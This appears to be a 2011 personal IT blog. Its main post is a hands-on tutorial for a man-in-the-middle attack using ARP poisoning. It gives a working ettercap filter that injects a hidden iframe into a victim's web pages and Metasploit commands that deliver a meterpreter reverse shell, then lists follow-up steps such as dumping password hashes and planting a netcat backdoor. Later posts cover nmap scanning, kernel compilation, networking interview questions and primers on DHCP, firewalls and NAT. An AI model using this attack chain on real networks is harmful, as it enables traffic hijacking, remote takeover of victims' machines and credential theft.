Monday, May 30, 2011

MITM Browser Injection Attack With Backtrack and Ettercap

The instructions contained below are provided for informational\educational purposes only and should only be used on networks that you control, or have permission to utilize.

Conditions: Access to the network has already been gained by either wireless cracking or some other access to a wired network. The target's IP and operating has already been discovered as well as the gateway IP address. The test computer, the target as well as the gateway are all on the same subnet. The target is a patched Windows XP machine running SP3 and IE8.

The attack will begin with a basic MITM (Man-In-The-Middle) ARP poisoning attack against a single target on a network.

The network traffic, specifically the Web pages browsed by the target will be intercepted by the test computer, and an iframe will be injected into all of the web pages viewed. This iframe will point back to the test computer which will be hosting a web page with a malicious payload (via the Meta- sploit framework).

When the user browses to most web pages this iframe will execute the malicious content hosted on the test computer in their browser. The end result will be admin\root access to the targets compu- ter via a meterpreter session.
am image

Prepare Backtrack

Open a terminal session and type

/usr/bin/start-network

This command enables the networking on Backtrack. Nowyou need to update Metasploit. In a terminal type:

cd /pentest/exploit/framework3

This brings us to the Metasploit directory. Type in:

svn update (at the prompt type y)

This will update the Metasploit framework with the latest modules. Now you need to enable IP forwarding using iptables. Enter the following in a terminal window

echo 1 > /proc/sys/net/ipv4/ip_forward

Ensure ip forwarding is enabled in ettercap. You need to edit the etter.conf file. Type Kate from a terminal for a GUI text editor or choose it from the Utilities menu.If you're using Backtrack4 Final Release the file can usually be found here: /etc/etter.conf You need to make 3 changes in etter.conf:

ec-uid = 0

ec_guid = 0

Uncomment the redir_command_on and redir_command_off sections below the "if you use iptables" section of etter.conf

Prepare Ettercap filter

Ettercap is a network sniffer that can not only log packet data but can use filters to inject or replace data within the packets. When used in a MITM attack ettercap filters can drop packets, or inject code into packets that will be forwarded to the target machine. Enter this data into a text file using your favorite text editor and save it as iframe.txt:

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("(/title)", "(/title>)iframe src="http://youripaddress" width=0 height=0>(/iframe)");
msg("iframe Filter Ran.\n");
}

The above filter will put our iframe right before the closing body tag in most web sites. Now from a terminal and in the same directory where you saved iframe.txt enter:

ettefilter iframe.txt –o iframe.ef

This command compiles the iframe.txt file into the actual etterrcap filter, or "ef" file. A success message would look like this: Script encoded into 15 instructions.
am image

Launch Metasploit

From the /pentest/exploit/framework3directory launch the Metasploit console with this command:

msfconsole

You can choose your favorite browser exploit for example: windows/browser/ms10_xxx_helpctr_ xss_cmd_exec. Metasploit commands:

Use windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Set PAYLOAD windows/meterpreter/reverse_tcp

Set LHOST youripaddress

Set SRVHOST youripaddress

Set SRVPORT 80

Exploit
am image

Launch Ettercap for MITM attack

Enter the following command into a terminal window (replace underlined items with the correct name in your environment):

ettercap –i wlan –F iframe.ef –TQM arp:remote /targetip/ /gatewayip/ -P autoadd

The –i witch specifies interface, you only need it if you have multiple interfaces. If you have only one you can omit. –F is specifying the filter to use. T= text mode, Q=quiet M=MITM attack.

You may see only one of the addresses is added to an ettercap group. This is not uncommon with wireless clients. Both the gateway and target need to show up in one of the groups. You can either wait until your target sends an arp request or you can force it to by pinging a non existent IP on your subnet from the target. The choice is yours.

Once ettercap is running open up IE on your target and browse somewhere. You should see the "iframe filter run" message on your Backtrack box.You should also see the exploit initiate on the Metasploit terminal. On your victim box a message will pop up. If you click allow the exploit will run.You should then see a meterpreter session initiated on your Backtrack computer. You can hit CTRL+C then type sessions –i 1 to interact with the meterpreter session.

You've compromised the box! You can now do things like drop to a command shell on the target by entering shell into meterpreter. If you want to be surreptitious you could enter execute –F cmd.exe –i –H –c. there are many things you can do with a successful meterpreter session setup. You can upload\download files, grab password hashes, send over a secure back door program like netcat or edit the registry.

Friday, May 27, 2011

Get NMAP on UBUNTU

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

October 20, 2007 by taufanlubis

nmap is a powerfull scanner available in Unix/Linux system. It’s very usefull for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine againts single hosts.

It’s very easy to install nmap in Ubuntu, just download from the internet.

taufanlubis@zyrex:~$ sudo apt-get install nmap



In this practice, I used 2 computer.

PC-01, IP = 192.168.0.3 (OpenSuse 10.1) with Kernel 2.6.16.13-4-default

PC-02, IP = 192.168.0.2 (Ubuntu Feisty)

I run nmap from Ubuntu to scan PC-01.



IP Scanning with range 192.168.0.0 – 192.168.0.255

taufanlubis@zyrex:~$ sudo nmap -sP 192.168.0.0/24

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:51 WIT

Host 192.168.0.2 appears to be up.

caught SIGINT signal, cleaning up

taufanlubis@zyrex:~$



IP Scanning with range 192.168.0.1 – 192.168.0.254

taufanlubis@zyrex:~$ sudo nmap -sP 192.168.0.1-254

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:53 WIT

Host 192.168.0.2 appears to be up.

Host 192.168.0.3 appears to be up.

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Nmap finished: 255 IP addresses (2 hosts up) scanned in 31.242 seconds

taufanlubis@zyrex:~$



Port Scanning with range port 100 – port 139

taufanlubis@zyrex:~$ nmap 192.168.0.3 -p100-139

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:06 WIT

Interesting ports on 192.168.0.3:

Not shown: 38 filtered ports

PORT STATE SERVICE

113/tcp closed auth

139/tcp open netbios-ssn

Nmap finished: 1 IP address (1 host up) scanned in 24.914 seconds

taufanlubis@zyrex:~$

For 40 ports, it took almost 25 seconds, so it will take much longer if you want to scan from 1-65535 (all ports in a computers).



Scanning Operating system on target IP

taufanlubis@zyrex:~$ sudo nmap -O 192.168.0.3

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:20 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE

80/tcp open http

113/tcp closed auth

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|specialized|WAP|storage-misc

Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Atmel Linux 2.6.X (91%), Siemens linux (91%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Inventel embedded (88%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (91%), Siemens Gigaset SE515dsl wireless broadband router (91%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop



OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 94.942 seconds

taufanlubis@zyrex:~$



nmap Faster Execution

If you want to make faster scan, use -T4 option on nmap command..

taufanlubis@zyrex:~$ sudo nmap -A -T4 192.168.0.3

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:42 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))

113/tcp closed auth

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|WAP|specialized|storage-misc|broadband router

Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Siemens linux (93%), Atmel Linux 2.6.X (92%), Inventel embedded (89%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Netgear embedded (87%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Siemens Gigaset SE515dsl wireless broadband router (93%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (93%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (92%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop



OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 58.830 seconds

taufanlubis@zyrex:~$

Now, you only need 58,83 seconds compare to 94.94 seconds (without -T4 option).



For more details, just open the nmap manual.

taufanlubis@zyrex:~$ man nmap

Monday, May 23, 2011

Make you own linux - Check how..

How to download Linux Kernal

http://www.kernel.org/

How to: Compile Linux kernel 2.6

Compiling custom kernel has its own advantages and disadvantages. However, new Linux user / admin find it difficult to compile Linux kernel. Compiling kernel needs to understand few things and then just type couple of commands. This step by step howto covers compiling Linux kernel version 2.6.xx under Debian GNU Linux. However, instructions remains the same for any other distribution except for apt-get command.
Step # 1 Get Latest Linux kernel code

Visit http://kernel.org/ and download the latest source code. File name would be linux-x.y.z.tar.bz2, where x.y.z is actual version number. For example file inux-2.6.25.tar.bz2 represents 2.6.25 kernel version. Use wget command to download kernel source code:
$ cd /tmp
$ wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2

Note: Replace x.y.z with actual version number.
Step # 2 Extract tar (.tar.bz3) file

Type the following command:
# tar -xjvf linux-2.6.25.tar.bz2 -C /usr/src
# cd /usr/src
Step # 3 Configure kernel

Before you configure kernel make sure you have development tools (gcc compilers and related tools) are installed on your system. If gcc compiler and tools are not installed then use apt-get command under Debian Linux to install development tools.
# apt-get install gcc

Now you can start kernel configuration by typing any one of the command:

* $ make menuconfig - Text based color menus, radiolists & dialogs. This option also useful on remote server if you wanna compile kernel remotely.
* $ make xconfig - X windows (Qt) based configuration tool, works best under KDE desktop
* $ make gconfig - X windows (Gtk) based configuration tool, works best under Gnome Dekstop.

For example make menuconfig command launches following screen:
$ make menuconfig

You have to select different options as per your need. Each configuration option has HELP button associated with it so select help button to get help.
Step # 4 Compile kernel

Start compiling to create a compressed kernel image, enter:
$ make
Start compiling to kernel modules:
$ make modules

Install kernel modules (become a root user, use su command):
$ su -
# make modules_install
Step # 5 Install kernel

So far we have compiled kernel and installed kernel modules. It is time to install kernel itself.
# make install

It will install three files into /boot directory as well as modification to your kernel grub configuration file:

* System.map-2.6.25
* config-2.6.25
* vmlinuz-2.6.25

Step # 6: Create an initrd image

Type the following command at a shell prompt:
# cd /boot
# mkinitrd -o initrd.img-2.6.25 2.6.25

initrd images contains device driver which needed to load rest of the operating system later on. Not all computer requires initrd, but it is safe to create one.
Step # 7 Modify Grub configuration file - /boot/grub/menu.lst

Open file using vi:
# vi /boot/grub/menu.lst

title Debian GNU/Linux, kernel 2.6.25 Default
root (hd0,0)
kernel /boot/vmlinuz root=/dev/hdb1 ro
initrd /boot/initrd.img-2.6.25
savedefault
boot

Remember to setup correct root=/dev/hdXX device. Save and close the file. If you think editing and writing all lines by hand is too much for you, try out update-grub command to update the lines for each kernel in /boot/grub/menu.lst file. Just type the command:
# update-grub
Neat. Huh?
Step # 8 : Reboot computer and boot into your new kernel

Just issue reboot command:
# reboot
For more information see:

* Our Exploring Linux kernel article and Compiling Linux Kernel module only.
* Official README file has more information on kernel and software requirement to compile it. This file is kernel source directory tree.
* Documentation/ directory has interesting kernel documentation for you in kernel source tree.

Featured Articles:

* 20 Linux System Monitoring Tools Every SysAdmin Should Know
* 20 Linux Server Hardening Security Tips
* My 10 UNIX Command Line Mistakes
* The Novice Guide To Buying A Linux Laptop
* 10 Greatest Open Source Software Of 2009
* Top 5 Email Client For Linux, Mac OS X, and Windows Users
* Top 20 OpenSSH Server Best Security Practices
* Top 10 Open Source Web-Based Project Management Software
* Top 5 Linux Video Editor Software


Enjoy by Vjss

Thursday, May 19, 2011

Trobleshooting VM issues..

what I am trying to do here... On the host computer i got Win7 and i've installed VMware Workstation on it and in there i got Winxp now I want to create network between my Host Win7 and VMXp..
Error : "The network bridge on device /dev/vmnet0 is temporarily down because the bridged Ethernet interface is down. The virtual machine may not be able to communicate with the host... or with other machines on your network." 

Wednesday, May 18, 2011

My Pets :)






















Prepare your self for..

1. Explain Boot Process
2. Explain OSI Model
3. Explain working of DNS and DHCP
4. In DNS , what is
i ) Recursive and Iterative Query
ii ) Kind of Records in DNS

iii ) Root hints

iv ) nslookup

5. How to promote and demote a server (Ans . dcpromo )


6. A client machine does not have internet connection. How will you troubleshoot ?

7. Define

i ) Encryption

ii ) PKI

iii ) Certificate

iv ) Firewall




8. What is Group Policy( GP ) . In what sequence does it apply ( Ans . Local , Sites , Domain then OU ). What GP takes precedence “Allow” or “Deny “ ( Ans . Deny )




9. Group Policy is not applying on a client machine. How will you troubleshoot? What tools will you use to detect what GPs are getting applied on the client machine [Ans. Gpresults and Resultant set of Policies ( Rsop ) ]


Ans . Check for Event ID 1030 and 1058 on the client machine. The policy which is not getting applied on the client machine will be mentioned in the Events( 1030/1058) . Try to ping that policy from the client machine. Check whether that Policy is present on the server under C:\Windows\Sysvol\sysvol\domain.local\Policies folder. If present check whether we are able to access that policies folder from the client machine \\Server name\sysvol . Check whether sysvol is shared on the server ( start -> cmd -> net share )



10. Difference between Domain and Workgroup.


11. What are the Kinds of Deployment services. Difference between .msi and .exe file .

12. Difference Between Fat and NTFS

13. What is nbtstat , Mac Address , APIPA , Netmon(Network Monitor tool). What are the IP classes .


14. Explain FSMO roles

15. What are the Security Differences between Windows 2003 and Windows 2008 server.

16. What is the Database filename for Active Directory and where is it stored ?


( Ans. C:\Windows\NTDS\ntds.dit )

17. What does System state consist ?

18. How will you Create a user on the server (Administrative tools à AD users and Computers .. right click Create a new user)

How will you create a local user on a client machine ( Ans . Right Click My Computer à Manage .. Create a New user )


19. What is Tombstone and Journal Wrap in AD ?

20.DORA process

21.iterative and recursive dns query

22.forward and reverse DNS look up zones 

Posted by Vj 

Tuesday, May 17, 2011

Tum Shankar~~




















Learn

What is DHCP?

The Internet is a vast source of information that is continuously updated and accessed via computers and other devices. For a device (also referred to as a host) to connect to the Internet, it is necessary that among other configurations, it must have an Internet Protocol (IP) address. The IP address is the computer's address on the Internet. A common comparison of an IP address is an individual's telephone number, which is an identifier for people to communicate with the individual. Up until the late 1980s, configuring a computer to connect to the Internet was a manual process. The protocol Bootstrap Protocol (BOOTP) was the first Transmission Control Protocol/Internet Protocol (TCP/IP) network configuration tool used to prevent the task of having to manually assign IP addresses by automating the process.
While the introduction of the BOOTP network protocol was a welcome innovation for network administrators tasked with managing large numbers of computers on a network, it was the first attempt and a new and improved TCP/IP network protocol soon followed. This protocol is called Dynamic Host Configuration Protocol (DHCP). DHCP was not designed as a replacement for BOOTP, but an extension of its functionality.

How DHCP Works

As its name indicates, DHCP provides dynamic IP address assignment. What this means is that instead of having to rely on a specific IP address, a computer will be assigned one that is available from a subnet or "pool" that is assigned to the network. DHCP also extends BOOTP functionality to provide IP addresses that expire. BOOTP indirectly uses a form of leasing that never expired, but the term wasn't actually used until the introduction of DHCP. When DHCP assigns an IP address, it actually leases the identifier to the host computer for a specific amount of time. The default lease is five days, but a network administrator should evaluate their own particular circumstances to determine an appropriate lease.
In basic terms, the DHCP lease process works as follows:
  1. A network device attempts to connect to the Internet.
  2. The network requests an IP address.
  3. The DHCP server allocates (leases) the network device an IP address, which is forwarded to the network by a router.
  4. DHCP updates the appropriate network servers with the IP address and other configuration information.
  5. The network device accepts the IP address.
  6. The IP address lease expires.
  7. DHCP either reallocates the IP address or leases one that is available.
  8. The network device is no longer connected to the Internet.
  9. The IP address becomes an available address in the network pool of IP addresses.
To set up DHCP, you basically need a DHCP-supported client (at least one) and router, and a DHCP server. The client is a computer or other device on a network that requires an IP address and or other network configuration information. The router functions as a forwarding (or routing) agent of IP address requests from the DHCP server. The DHCP server is key to the entire operation. It is responsible for allocating, leasing, reallocating, and renewing IP addresses. Windows and Linux both support DHCP software.

Learn

What is a Firewall?

A firewall is a security device that can be a software program or a dedicated network appliance. The main purpose of a firewall is to separate a secure area from a less secure area and to control communications between the two. Firewalls can perform a variety of other functions, but are chiefly responsible for controlling inbound and outbound communications on anything from a single machine to an entire network.

Software Firewalls

Software firewalls, also sometimes called personal firewalls, are designed to run on a single computer. These are most commonly used on home or small office computers that have broadband access, which tend to be left on all the time. A software firewall prevents unwanted access to the computer over a network connection by identifying and preventing communication over risky ports. Computers communicate over many different recognized ports, and the firewall will tend to permit these without prompting or alerting the user. For example, computers access Web pages over port 80 and use port 443 for secure Web communications. A home computer would expect to receive data over these ports. However, a software firewall would probably block any access from the Internet over port 421, over which it does not expect to receive data. Additionally, port 421 has been used by certain Trojans (a type of malware) in the past. Software firewalls can also detect "suspicious" activity from the outside. They can block access to a home computer from an outside address when activity matches certain patterns, like port scanning.
A software firewall also allows certain programs on the user's computer to access the Internet, often by express permission of the user. Windows Update, antivirus software, and Microsoft Word are a few programs that a user might legitimately expect to access the Internet. However, a program called gator.exe that is attempting to access the Internet when it shouldn't be running might be reason for concern, so the user could decline access for this program. This is a useful feature when spyware, adware or some type of malware is suspected.
Some software firewalls also allow configuration of trusted zones. These permit unlimited communication over a wide variety of ports. This type of access may be necessary when a user starts a VPN client to reach a corporate intranet.
One drawback to software firewalls is that they are software running on a personal computer operating system. If the underlying operating system is compromised, then the firewall can be compromised as well. Since many other programs also run on a home computer, malicious software could potentially enter the computer through some other application and compromise the firewall. Software firewalls also rely heavily upon the user making the right decisions. If someone using a software firewall mistakenly gives a keylogger or a Trojan permission to access the Internet, security on that machine is compromised even though there is nothing wrong with the firewall itself.
There are many different brands of software firewalls, each with their own features. Some examples include ZoneAlarm, BlackICE, and Kerio.

Hardware Firewalls

Hardware firewalls are more complex. They also have software components, but run either on a specially engineered network appliance or on an optimized server dedicated to the task of running the firewall. The operating system underlying a hardware firewall is as basic as possible and very difficult to attack. Since no other software runs on these machines, and configuration takes a little more thought than clicking on an "allow" prompt, they are difficult to compromise and tend to be extremely secure.
A hardware firewall is placed between a network, such as a corporation, and a less secure area, such as the Internet. Firewalls also can separate more secure networks from less secure networks, such as one corporate location within a larger corporate structure. Versions of hardware firewalls are available to home users who want stronger protection from potential Internet attacks. There are many different default configurations for these devices - some allow no communications from the outside and must be configured, using rules, others (like those available for the home market) are already configured to block access over risky ports. Rules can be as simple as allowing port 80 traffic to flow through the firewall in both directions, or as complex as only allowing 1433 (SQL server) traffic from a specific IP address outside of the network through the firewall to a single IP address inside the network.
Firewalls are also used for Network Address Translation (NAT). This allows a network to use private IP addresses that are not routed over the Internet. Private IP address schemes allow organizations (or even household networks) to limit the number of publicly routed IP addresses they use, reserving public addresses for Web servers and other externally accessed network equipment. NAT allows administrators to use one public IP address for all of their users to access the Internet - the firewall is "smart" enough to send the requests back to the requesting workstation's internal IP. NAT also allows users inside a network to contact a server using a private IP while users outside the network must contact the same server using an external IP.
In addition to port and IP address rules, firewalls can have a wide variety of functionality. They can also act as caching servers, VPNs, routers, and more. Some examples of hardware firewalls are CheckPoint, Cisco PIX, SonicWall, Contivity from Nortel, and Linksys (for the home market).
Firewalls are vital to network management. Without this control over computer and network access, large networks could not store sensitive data intended for selective retrieval. Firewalls are also very important for home broadband users - without a home version of one of these products, your personal data is at risk.

Learn

What is a Private IP Address?

When you send a letter from your house to a friend, you have to know the address to send it to so that the postman knows which street and which house to take it to. Computer networks such as the Internet are no different except instead of sending your web traffic to "1145 Main Street"; your computer's location is known as an IP Address.
An IP address is your computer's equivalent of your postal address and just like the mail service, each computer has to have its own address so that it will only receive the information that is meant for it and not anything that is meant for someone else.
While we are used to writing out streets and house numbers on envelopes, inside your computer IP Addresses are usually represented in what is known as dotted-decimal format such as 124.62.112.7 as this is the system that is understood by computers. As you can see, the address is split into 4 sections known as "octets" and each of the four octets can be numbered from 0-255, providing a total of 4,294,967,296 potentially unique IP Addresses.
Now, while 4.2 Billion might seem like a lot, for many years large amounts of these have been allocated and used by large network such as backbone providers, ISPs and large Universities that made up the early Internet While other groups still have been reserved for special purposes and are not usable, so in practice the real amount is far less than 4.2 billion. The problem that we face today is that with many homes owning more than one computer and with cell phones, PDAs and even fridges being enabled for Internet access these days, IP Addresses are running out.
When I mentioned above that some blocks of addresses had been reserved for special purposes, one of these purposes was for private networking and it is these private addresses that help to relieve the pressure on the remaining address space and make possible many of the cable and DSL routers that people have at home today to share their Internet connection amongst many PCs.

Private IP address ranges

The ranges and the amount of usable IP's are as follows:
10.0.0.0 - 10.255.255.255
Addresses: 16,777,216
172.16.0.0 - 172.31.255.255
Addresses: 1,048,576
192.168.0.0 - 192.168.255.255
Addresses: 65,536

So, what are these addresses and how do they work?

For example, if I had 6 computers that I wanted to network, I might number them from 172.16.0.1 up to 172.16.0.6 and this would still leave over a million more addresses that I could use if I were to buy some more computers or if I was networking a large office and needed lots and lots of addresses.
These blocks of addresses can be used by anyone, anywhere - even if your neighbor is using the exact same addresses this won't cause a problem. This is possible because these addresses are known as "non-Routable addresses" and the devices on the internet that move data from one place to another are specially programmed to recognize these addresses. These devices (known as routers) will recognize that these are private addresses belonging to your network and will never forward your traffic onto the Internet so for your connection to work; you will always require at least one real address from the general pool so that your home router can perform what is known as "Network Address Translation".
NAT is a process where your router changes your private IP Address into a public one so that it can send your traffic over the Internet, keeping track of the changes in the process. When the information comes back to your router, it reverses the change back from a real IP Address into a private one and forwards the traffic back to your computer.
Private addresses and NAT is what makes your home router work and by using them, anyone is able to connect as many computer's as they wish to the Internet without having to worry about running out of addresses and this gives everyone many more years until all the available addresses are used up.

Learn

What is Network Address Translation?

Network Address Translation (NAT) is the process where a network device, usually a firewall, assigns a public address to a computer (or group of computers) inside a private network. The main use of NAT is to limit the number of public IP addresses an organization or company must use, for both economy and security purposes.
The most common form of network translation involves a large private network using addresses in a private range (10.0.0.0 to 10.255.255.255, 172.16.0.0 to 172.31.255.255, or 192.168.0 0 to 192.168.255.255). The private addressing scheme works well for computers that only have to access resources inside the network, like workstations needing access to file servers and printers. Routers inside the private network can route traffic between private addresses with no trouble. However, to access resources outside the network, like the Internet, these computers have to have a public address in order for responses to their requests to return to them. This is where NAT comes into play.
Internet requests that require Network Address Translation (NAT) are quite complex but happen so rapidly that the end user rarely knows it has occurred. A workstation inside a network makes a request to a computer on the Internet. Routers within the network recognize that the request is not for a resource inside the network, so they send the request to the firewall. The firewall sees the request from the computer with the internal IP. It then makes the same request to the Internet using its own public address, and returns the response from the Internet resource to the computer inside the private network. From the perspective of the resource on the Internet, it is sending information to the address of the firewall. From the perspective of the workstation, it appears that communication is directly with the site on the Internet. When NAT is used in this way, all users inside the private network access the Internet have the same public IP address when they use the Internet. That means only one public addresses is needed for hundreds or even thousands of users.
Most modern firewalls are stateful - that is, they are able to set up the connection between the internal workstation and the Internet resource. They can keep track of the details of the connection, like ports, packet order, and the IP addresses involved. This is called keeping track of the state of the connection. In this way, they are able to keep track of the session composed of communication between the workstation and the firewall, and the firewall with the Internet. When the session ends, the firewall discards all of the information about the connection.
There are other uses for Network Address Translation (NAT) beyond simply allowing workstations with internal IP addresses to access the Internet. In large networks, some servers may act as Web servers and require access from the Internet. These servers are assigned public IP addresses on the firewall, allowing the public to access the servers only through that IP address. However, as an additional layer of security, the firewall acts as the intermediary between the outside world and the protected internal network. Additional rules can be added, including which ports can be accessed at that IP address. Using NAT in this way allows network engineers to more efficiently route internal network traffic to the same resources, and allow access to more ports, while restricting access at the firewall. It also allows detailed logging of communications between the network and the outside world.
Additionally, NAT can be used to allow selective access to the outside of the network, too. Workstations or other computers requiring special access outside the network can be assigned specific external IPs using NAT, allowing them to communicate with computers and applications that require a unique public IP address. Again, the firewall acts as the intermediary, and can control the session in both directions, restricting port access and protocols.
NAT is a very important aspect of firewall security. It conserves the number of public addresses used within an organization, and it allows for stricter control of access to resources on both sides of the firewall.

Learn

What is a Router?

Before we delve into the world of routers, you need to understand what a broadband connection is and how it works. According to Dictionary.com, broadband is "a high-speed, high-capacity transmission medium that can carry signals from multiple independent network carriers. This is done on a single coaxial or fiber-optic cable by establishing different bandwidth channels. Broadband technology can support a wide range of frequencies. It is used to transmit data, voice and video over long distances simultaneously."
Routers take information that arrives through your broadband signal via a modem, decipher it, and deliver it to your computer. The router will also choose the best route for the data packet so that you receive the information quickly.
Many different types of routers have been developed so that the information coming over your broadband connection can be sent to a variety of different receivers including your computer, your phone, and others.

Types of Routers

There are several types of routers that you will want to understand. You need to know the difference so that you can set up your network or at least so that you can understand what the local computer guy tells you to do.

Broadband Routers

Broadband routers can be used to do several different types of things. They can be used to connect two different computers or to connect two computers to the Internet. They can also be used to create a phone connection.
If you are using Voice over IP (VoIP) technology, then you will need a broadband router to connect your Internet to your phone. These are often a special type of modem that will have both Ethernet and phone jacks. Although this may seem a little confusing, simply follow the instructions that your VoIP provider sends with your broadband router - usually you must purchase the router from the company in order to obtain the service.

Wireless Routers

Wireless routers connect to your modem and create a wireless signal in your home or office. So, any computer within range can connect to your wireless router and use your broadband Internet for free. The only way to keep anyone from connecting to your system is to secure your router.
A word of warning about wireless routers: Be sure your secure them, or you will be susceptible to hackers and identity thieves. In order to secure your router, you simply need to come to WhatIsMyIPAddress.com, and get your IP address. Then, you'll type that into your web browser and log into your router (the user ID and password will come with your router).
Remember to change the router ID and password as well or someone else might lock you out of your system.
Once there, visit the wireless settings, type in a security key and you'll be about ready to go. Make sure you write down the key or save it in a Word document. When you try to log onto your Internet connection, you'll just need to enter the key. Your computer should remember the key, but write it down somewhere for safe keeping just in case.